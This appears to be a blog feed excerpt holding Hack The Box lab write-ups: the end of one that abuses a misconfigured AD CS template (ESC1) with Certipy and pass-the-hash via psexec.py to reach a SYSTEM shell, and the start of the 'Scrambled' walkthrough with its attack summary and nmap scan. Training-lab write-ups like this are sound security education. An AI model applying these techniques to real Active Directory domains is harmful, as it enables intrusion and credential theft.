block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABSElEQVR42i2R23LiMBBE/S0QA75gJMuSbNn4AhiosMlWkn3Y//+Rs4PZh6nu6im1Wq0oNu+82W+S6kHpL5yvP4yXL07XP/TTB9ZNJDtLkjo2iSPLPPvck+8b0rwhzgKpHonThnVSE+X+QWbOtMPHf6MfQv+g7X+hw4wb7xRuoDA9sXuw775pp0+O3UzlTpT1Ddu9o9yFVA1EfvqLNgM+3PDtHSdYlCNldSYRPQ1XVupIXHSszI11+ER1vznI3vg7ys4Uwp/GmSSNdP+FMhOmnhcz19w4iOGTK/MyzorjMht50rY4YaoRXU1YP6Nkr6rTUlcil0Y+nHHaSx+BXPXLwfzQs9fCJVmuB9EHMtG2aU0oLa2x1IKdYCidcI9Rz169JKw6irQk3lpWccV688LVRvhTW9AtE+/8YmjVaxrhtbbLJ623NW+7mn/lBcOcckRyhwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec adcs" title="" src="/static/dea5e5d77bbe5ee5e237052152b52e38/50637/netexec-adcs.png" srcset="/static/dea5e5d77bbe5ee5e237052152b52e38/dda05/netexec-adcs.png 158w, /static/dea5e5d77bbe5ee5e237052152b52e38/679a3/netexec-adcs.png 315w, /static/dea5e5d77bbe5ee5e237052152b52e38/50637/netexec-adcs.png 630w, /static/dea5e5d77bbe5ee5e237052152b52e38/e899a/netexec-adcs.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So with the Certipy <code class="language-text">find</code> command, I enumerated AD CS:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/34eceb98b9f264ca1bc6876a846e7989/3376a/certipy-find.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 48.734177215189874%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1UlEQVR42k1S2baiQBDjW1wABRFBoJtNVpfrfmfm/z8lk2pmPPchJ8qBVCopyw5qLOMb7P0T7q5FWpxQdy8c+jcO3Ruq+oIbFFiuFVxPYfUPLv8vVhqLdQ5nU/KdyrC1zc4I8ztxQ5QNiPWIdvim2AvN8Kb4E0HUwPELbAKFcKsRhRr+RmPJZzaFvF0DP2qxDg+w4qyHLs9Q+RF7NSLVJ8PF4YZ9NmLhppjbKTnDnJg5E+auwtxR07MfsLLijHacnAia/oWqfWA8/+HaL3hBieWKH9rJBIcDnAQzM0RNwsRHMKEjESjqK6rmjvJwR1Hd0I3fdHmFKr8MYrrdxi38bU3uEO47DtIGtlcwv2LKUJUXCt659sUI5tXVuJOVNQsRHozbaYusuKBsHqa4NL8wFonoBC+ccrTitEdOsYxOU4MzMr5Yt/w4Z7YUSMmag0RMIL/36vhx6rOMDS/E34lg0iHiKiGblBIEYSSrVYhTts7mIw5dyWmw1Z+85smtg9JARD3GYWkppX9iOP7CePrNc3ly9QfL4YrMViKR4iKKR0mPrZwHT0XylHPyw9qwiHk0YSV0UDCrmlkJa64UJYMRlUxNDPkJeX014uJkZicG/9uefdpP8RfdCku6GjdlgAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="certipy find" title="" src="/static/34eceb98b9f264ca1bc6876a846e7989/50637/certipy-find.png" srcset="/static/34eceb98b9f264ca1bc6876a846e7989/dda05/certipy-find.png 158w, /static/34eceb98b9f264ca1bc6876a846e7989/679a3/certipy-find.png 315w, /static/34eceb98b9f264ca1bc6876a846e7989/50637/certipy-find.png 630w, /static/34eceb98b9f264ca1bc6876a846e7989/3376a/certipy-find.png 694w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">UserAuthentication</code> template had all of the conditions met for an ESC1 vulnerability:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3f416a0e82b7c6726e741cef6d8aa865/a1ee8/ESC1.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 95.56962025316456%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAYAAACQjC21AAAACXBIWXMAAAsTAAALEwEAmpwYAAADCUlEQVR42n2U6XLaQBCE9SgBJITu+z7QARhz+MBOpSrv/x6TnhGGIk7lR7MCSd/29MyieMlAUbElP51WN+5INVOaGyktzEyk2QUtnfIm3S1v9/6WouKj7E7UjK9U9y9keDWt3IqWgPADDHawybD/oO7pQiWeSer9/4H18CLy01FcsnSnvAHdpKdifSTTx2ZOQTM9osUqnmQkk8ypIkUzMqrgsN9dqAU0KXZk+Q1pZk4q7i1WKXnxQOX6RLNlTD+gOX6bAzbXWSHNl8EkXCsaO+zPNDx9UDu+UdEeKaufyYv6B2CLSMJsJDdsyQkasuF2ArKiCai6KBklxXCVNwdKyieRbpd3h3pCTogMUcHu+EtyjvFMXKISrwIovCoSCTBIN5RWewqxxvmOdCunmRaTZuQoLSE36hDJh8RSd2cKkCk75M0WK2yK5yYVE9AJWuzWYF2T47codyDTbbBjIiXz/TXi4Epsn0vu4LrHvfwBxuVLU7rNG/SOprzKi3X3Ik7dcMqRS46yLRylIpVd6dl3oOZfu4yRaJBNg+bEeFG3SjKcSsQAdsSbcaP4O0ehMuwbMJiADNvsP+HsRD46yu5WaMwcI8IA06klBr7mGOZLrP9wyJkq/MFOyvZABTqdooM5xsYUd4lALK/F/RN+P6CaM6UFnqmOmAaMzkNT8gm4wqnwkJPl1mSjGQ4ANoZ7cpngeo1s37HhUfKd4EfyoxEZFw9OBWji7LbdlJ+PnMJklOsvIDdn2F7EXTu8yegw2AuHe5ZXqKICqGE0bLjj0jgvHh0bY6TyEUOOnN/h/Jv6zQVZ/6R+i5nEBlG6FeCXGKqYWkT2KpESHUAsBgJsuXegizgY1PSvGK+LrKwg2Vw7nt2gioEXIhwZGVgAOUt2F8CVi0GfYUMPJ2V3+CU5jrtP6rAymIETKLtJ0QGM8QfBMHEIZ7qJoPmU8IioMTKuZbSy6lkawmta7iUKdnh3CaBhFRiDLVUYlQgzGEIOumpfy+bO85HMcdbjfCujw0DOz3AaGXo/HuUdPq5/ADKHYvEs7MZpAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="UserAuthentication ESC1" title="" src="/static/3f416a0e82b7c6726e741cef6d8aa865/50637/ESC1.png" srcset="/static/3f416a0e82b7c6726e741cef6d8aa865/dda05/ESC1.png 158w, /static/3f416a0e82b7c6726e741cef6d8aa865/679a3/ESC1.png 315w, /static/3f416a0e82b7c6726e741cef6d8aa865/50637/ESC1.png 630w, /static/3f416a0e82b7c6726e741cef6d8aa865/a1ee8/ESC1.png 706w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Configurations that cause ESC1:</p> <ul> <li> <p><code class="language-text">Client Authentication</code> : <code class="language-text">True</code></p> </li> <li> <p><code class="language-text">Enrollee Supplies Subject</code> : <code class="language-text">True</code></p> </li> <li> <p><code class="language-text">Requires Manager Approval</code> : <code class="language-text">False</code></p> </li> <li> <p><code class="language-text">Authorized Signatures Required</code> : <code class="language-text">0</code></p> </li> <li> <p><code class="language-text">Enrollment Rights</code> : <code class="language-text">SEQUEL.HTB\Domain Users</code></p> </li> </ul> <p>Next, using the <code class="language-text">req</code> command, I requested a certificate for the <code class="language-text">administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a554ac4bf1017dc85355da88028748c8/bf608/certipy-req.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABNklEQVR42i2QWZaCMBBF2UozSHBgNGFGEARtRe3+6f2v5PUL+HFPJZWcm1cx7OQOW/3ClTf46oz68kY9vNGOvwtB2sPcZXD8EsIv4AUltkQcctg7BYuIQ8Z+AZfnRlzPUO0P8tOMuBiR9DNk90BL6fT4Q3V+Iq4mhDwLsgvK7sneC2l1g2puiMoRigRJA7FXMGQ+IGay4NgikGfE6cD1WpNsYJoajseE2wyWp2ALCcs9kgQbT8IR6/prE8N0IhhVN6Pp3yjbB4rmvnDMJ0hNMWEX1rCEgkmRltmU6r3lpeytfZNCy6WQUqPpXzhRWHGUmkiOllVXpOWVo1wRftJqecgJDnH7kX5Em4RVro+IFIbiRY0WaGQ+Iq/v/KPvJeU+OsFPukUYqX6R7nVqVydOKcmZVpMt/AMfc8QLLrzO/gAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="certipy req" title="" src="/static/a554ac4bf1017dc85355da88028748c8/50637/certipy-req.png" srcset="/static/a554ac4bf1017dc85355da88028748c8/dda05/certipy-req.png 158w, /static/a554ac4bf1017dc85355da88028748c8/679a3/certipy-req.png 315w, /static/a554ac4bf1017dc85355da88028748c8/50637/certipy-req.png 630w, /static/a554ac4bf1017dc85355da88028748c8/bf608/certipy-req.png 680w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To make sure that the local clock was synced with the DC, I used <code class="language-text">ntpdate</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">sudo ntpdate -u dc.sequel.htb</code></pre></div> <p>Then, I authenticated with the certificate using the <code class="language-text">auth</code> command to retrieve the NTLM hash for the <code class="language-text">administrator</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c31fe59ad377d7fd1717a356b44f2314/ad007/certipy-auth.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHUlEQVR42m2Q606DQBBGeRQFLFCuC5SlheWOLS3aNkaN7/8gn7NLYzXxx8nsTDJnZkcz2YSn9AornhBsWtTDBd34huHwrmK628N0OFbuDrZX/GDaucKQOHc0Vszw+ISYPyPiA8r+jMP8hXH6wP70CdG8wHBz2KFAELdEA581JOP/Czf5iGw7Isl6pPRmm041BaxGmDSI0h4hiSza8MFMoVsZDOKP8JdUK2kD0b4io69Jmc8qrP1SCVzaah0IOLfcJoybUF/JyGkAx+Mt6jRkERI7cURRnYgZol7yqjuj6a+ou4t6F/UMlwa4YaUGeVEFL6yxJpyggk01LS8nJdpS3JZH1SxlUdKCpcvGUuCrE7SKiOqSJe/UWeR9bV/gGwc2w91TS+4JAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="certipy auth" title="" src="/static/c31fe59ad377d7fd1717a356b44f2314/50637/certipy-auth.png" srcset="/static/c31fe59ad377d7fd1717a356b44f2314/dda05/certipy-auth.png 158w, /static/c31fe59ad377d7fd1717a356b44f2314/679a3/certipy-auth.png 315w, /static/c31fe59ad377d7fd1717a356b44f2314/50637/certipy-auth.png 630w, /static/c31fe59ad377d7fd1717a356b44f2314/ad007/certipy-auth.png 681w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Passed the hash with <code class="language-text">psexec.py</code> to obtain a system shell:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1a6886d2c4d468965670c5fbd0f80d44/e899a/system-shell.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 75.9493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACO0lEQVR42n2T6XLaQBCE9SixQSAQQtfqWIGEDm4csF2Viqvy/s/R6VnZwWWCf3TtstJ+6p4ZLCdqMNEvGOtfcPMjqu6M3fENx8sfbE+/0Wxf4akGTljCDUr4qoYXcY1X8Hg25z7gmaxDJ4aVLA4I9R5u3CHMNojzLbLlAXl5RLrYI6MivUVYbAioeLYzSood392YvcpapLqD6xewhB5nHbVGkLR00GDGi1G6RsjfjldgOMkwGKe9nBSP4wQPdkSF72uMx1HCZxks+UK9fkazeUXLeGXzE3X3jP3pDUX1hPGsgO3mBmrADi+OVb86OQYT/Uk5LEXby/oJq/aCqjmjMusFitE1Y0u0WbiCPSWUDoZ0OHRyox74ScYhLyxWBNKVuBOI7NPiYGLnrOecjROYRO6hd4AshXEol4rqZMAJnS0YVfY5G6aXRyY4E75hTdeYzBbv4DsOpXMCk26KW4kas9ty8cFWptim4ITYk4/Y2RX4BUrgyjhMOBoiRZg758zNl5gFFbUy8sLaaDTV39bRmke1ARqHmrPFumXF3pyJBDaVD/iVUQ+879KK0g41O1uwGSVrVbBmApS9NEgAP4bqX+wrLLttEGVNOWdhzDh+H9On4yBue3HIA9WyDFsT9//AK1RkKUYs2VFFp1HSmRpOvaXpriNDzWEeTfM7oFuwlTNeu36BZoc1x0Sieqybz9kbMKYA5W8pMzl29Tcue1k2h1E0HClI/JSdlsbI2IhjiW5mkg3y4+bL6NwC/wI6OOKh22QEWQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system shell" title="" src="/static/1a6886d2c4d468965670c5fbd0f80d44/50637/system-shell.png" srcset="/static/1a6886d2c4d468965670c5fbd0f80d44/dda05/system-shell.png 158w, /static/1a6886d2c4d468965670c5fbd0f80d44/679a3/system-shell.png 315w, /static/1a6886d2c4d468965670c5fbd0f80d44/50637/system-shell.png 630w, /static/1a6886d2c4d468965670c5fbd0f80d44/e899a/system-shell.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-scrambled/https://mgarrity.com/hack-the-box-scrambled/Wed, 24 Jan 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d7f1f9bb0961e8961c9ba9aead4d85a1/3b67f/scrambled.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABC0lEQVR42mMQkdX+jwuLymn/F5LW/s8jDqRlIHx86kGYAZ9hvBLa/8UVtP7r6Wn+l1AE8iUJG8qAyzA+oGYzY53/0xMt/m8od/s/PcH0v6mRLlgcn6FYDRQGek9cWef/7HDt/+/7Ev/f3zT1/4f64P/zYnT/iyrq/BeRIcFAkO38Ujr/1bQ1/l/pDv7/e0/L/x8nJv3/vqbk//m2oP8aupr/BaRwuxJHGOr8F5VR/7+wwuP//2vL/r+9uvD/+wOT/y8C8oWl1cHyJHlZTA4SAQa6Gv8XVHv+P78s5f+0Iqf/hsDIISsMkSNGWFrtv6aaGjD5qBM0DK+BMJeKyun+F5QBBoGcDphPKB0CABpdEa73ZdSIAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Scrambled" title="" src="/static/d7f1f9bb0961e8961c9ba9aead4d85a1/50637/scrambled.png" srcset="/static/d7f1f9bb0961e8961c9ba9aead4d85a1/dda05/scrambled.png 158w, /static/d7f1f9bb0961e8961c9ba9aead4d85a1/679a3/scrambled.png 315w, /static/d7f1f9bb0961e8961c9ba9aead4d85a1/50637/scrambled.png 630w, /static/d7f1f9bb0961e8961c9ba9aead4d85a1/fddb0/scrambled.png 945w, /static/d7f1f9bb0961e8961c9ba9aead4d85a1/3b67f/scrambled.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Scrambled is a Windows machine running Active Directory. A username can be found on a hosted webpage as well as a message indicating that some accounts have the password set as the username. This provides the credentials for <code class="language-text">ksimpson</code> which can then be used to run a kerberoast attack, resulting in the password for <code class="language-text">sqlsvc</code>. With the service account, a silver ticket attack grants access to a MSSQL database that contains the credentials of the <code class="language-text">MiscSvc</code> account, leading to a shell over WinRM. <code class="language-text">MiscSvc</code> has access to an SMB share that contains a .NET application used for sales orders. After code analysis, a deserialization vulnerability can be discovered and leveraged to send a payload that results in a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text"># Nmap 7.93 scan initiated Sat Jan 20 10:41:08 2024 as: nmap -p1-10000 -sC -sV -oA nmap/output 10.10.11.168 Nmap scan report for scrm.local (10.10.11.168) Host is up (0.046s latency). Not shown: 9985 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Scramble Corp Intranet | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-20 15:41:41Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC1.scrm.local | Not valid before: 2024-01-20T15:12:16 |_Not valid after: 2025-01-19T15:12:16 |_ssl-date: 2024-01-20T15:44:47+00:00; 0s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC1.scrm.local | Not valid before: 2024-01-20T15:12:16 |_Not valid after: 2025-01-19T15:12:16 |_ssl-date: 2024-01-20T15:44:47+00:00; 0s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM |_ms-sql-info: ERROR: Script execution failed (use -d to debug) | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2024-01-20T15:22:05 |_Not valid after: 2054-01-20T15:22:05 |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug) |_ssl-date: 2024-01-20T15:44:47+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC1.scrm.local | Not valid before: 2024-01-20T15:12:16 |_Not valid after: 2025-01-19T15:12:16 |_ssl-date: 2024-01-20T15:44:47+00:00; 0s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC1.scrm.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported>, DNS:DC1.scrm.local | Not valid before: 2024-01-20T15:12:16 |_Not valid after: 2025-01-19T15:12:16 |_ssl-date: 2024-01-20T15:44:47+00:00; 0s from scanner time. 4411/tcp open found? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: | SCRAMBLECORP_ORDERS_V1.0.3; | FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: | SCRAMBLECORP_ORDERS_V1.0.3; |_ ERROR_UNKNOWN_COMMAND; 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port4411-TCP:V=7.93%I=7%D=1/20%Time=65ABE9B4%P=x86_64-pc-linux-gnu%r(NU SF:LL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"SCRAMBLEC SF:ORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\. SF:3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECORP_ORDER SF:S_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"SCRAMBLEC SF:ORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck,1D,"SCR SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCRAMBLECOR SF:P_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP_ORDERS_ SF:V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNO SF:WN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n SF:")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TLS SF:SessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1D,"SCRAM SF:BLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_ORDERS_V1\ SF:.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(FourO SF:hFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND SF:;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_ SF:COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")% SF:r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOptions,35," SF:SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(LANDesk SF:-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D,"SCRAMB SF:LECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r SF:\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaRMI,1D,"S SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECORP_ORDERS SF:_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r SF:(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCRAMBLECOR SF:P_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n"); Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 311: |_ Message signing enabled and required | smb2-time: | date: 2024-01-20T15:44:13 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Jan 20 10:44:48 2024 -- 1 IP address (1 host up) scanned in 220.59 seconds</code></pre></div> <p>Notable open ports:</p> <ul> <li>53 (DNS)</li> <li>80 (HTTP)</li> <li>88 (Kerberos)</li> <li>135 (MSRPC)</li> <li>139, 445 (SMB)</li> <li>464 (kpasswd)</li> <li>389, 3268 (LDAP)</li> <li>636, 3269 (LDAPS)</li> <li>1433 (MSSQL)</li> <li>4411 (?)</li> <li>5985 (WinRM)</li> </ul> <p>Active Directory:</p> <ul> <li>domain: scrm.local</li> <li>hostname: DC1</li> </ul> <p>Homepage on port 80, <code class="language-text">scrm.local</code> was an internal website for Scramble Corp:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8da69481173b91ae6e9b24a5a3a13ab7/ca644/homepage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 79.11392405063292%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB8UlEQVR42q2Ta1PaQBSG+f9f66AyWmuxU1AG5CKlOBEkIdCZNkMsUdS2g61Q6Q3b5p5N3p5kiVV71+7MM5tNdp89m3M2oawLYAhgmRZs276C4zgRhmHANE3ouh711+eZhomwrS3tIqEVmtEg8H3ctPmMr83ck5AYbHKhQzsxz0MQBLcTHhW5UP/yFaZl3V74ciZ0bQeexwjvgr+VXwhXSDgsNaJBeFyf/mMMY+yfhdkwwtflnf+WlFwoHFV+LQwjdF03Kg3X5SX0s6hjYf6+iMTbrT8ISRLWmWnZsEj8O2ExFL6rXhXGUcVECXI9io4/X/7mz9bEwkq6hcSHqvCDkPkMfhAmh/EkBTxJfPydONpYWF0j4Xm9QdeOQc2r6Jc1HDweRL1GiMR2SUNjax+t+iGEYh/12jFK0gSV9gTC0/coiWcoNMcwPEDI0JHPt5vQpw7EOy10lrro5VTIqQ7keRn5BRmryTbKGQW1wnOk50SsrjxDsjBEqniCR90JFjeHmNt4hY90nXfXLwtpsrzYQefuE7RTMuQFLkyTOLvcxUPa7EFSIqGCeRKGouXyCRfmuFDaIOG0tgO6IDhV3mCkjjDaG0f9mDgiNOIghN7v907R75+hd/wZKrH3gvfKYAo6MaQs/cNP15Jyo8KerZUyTXwD5yixOMVTjKoAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="homepage" title="" src="/static/8da69481173b91ae6e9b24a5a3a13ab7/50637/homepage.png" srcset="/static/8da69481173b91ae6e9b24a5a3a13ab7/dda05/homepage.png 158w, /static/8da69481173b91ae6e9b24a5a3a13ab7/679a3/homepage.png 315w, /static/8da69481173b91ae6e9b24a5a3a13ab7/50637/homepage.png 630w, /static/8da69481173b91ae6e9b24a5a3a13ab7/fddb0/homepage.png 945w, /static/8da69481173b91ae6e9b24a5a3a13ab7/ca644/homepage.png 1038w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The IT services page (<code class="language-text">/support.html</code>) contained a message saying that all NTLM authentication on the network has been disabled. There was also a section with links to resources:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/74c97e4dded3b58997a3da4cd4b1f79c/ca644/IT-services-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 55.69620253164557%; position: relative; bottom: 0; left: 0; background-image: 